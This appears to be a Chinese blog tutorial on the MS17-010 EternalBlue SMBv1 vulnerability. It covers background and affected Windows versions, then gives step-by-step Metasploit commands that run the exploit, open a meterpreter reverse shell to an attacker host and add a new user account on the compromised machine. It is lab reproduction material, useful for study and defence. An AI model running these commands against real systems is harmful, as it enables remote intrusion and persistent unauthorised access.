一、漏洞简介
MS17-010(永恒之蓝)漏洞原理是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让资源可互通。
MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-20170148。远程攻击者不需要身份验证就可以利用这些漏洞,通过专门制作的数据包来执行任意代码。
2017年4月黑客团体影子经纪人(Shadow Brokers)窃取了美国国家安全局一份包含了SMB漏洞利用工具在内的文件,蓄意勒索,最后将其公之于众,吸引一批黑客团体利用这些工具开发成勒索软件对SMB漏洞MS17-010展开攻击,由此暴发了WannaCry勒索病毒事件
二、 影响版本
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
三、漏洞复现
1、进入mfs
msfconsole
2、搜索漏洞模块
use exploit/windows/smb/ms17_010_eternalblue
3、 设置靶机ip
set RHOSTS 10.0.0.12
4、设置攻击者ip
set LHOST 10.0.0.8
5、设置payload
set payload windows/x64/meterpreter/reverse_tcp 反向连接
6、运行
run
7、攻击成功后
攻击成功后直接输入shell即可
dir命令查看目录
net user test1 123.com /add 创建用户
有问题请加博主微信进行沟通!
全部评论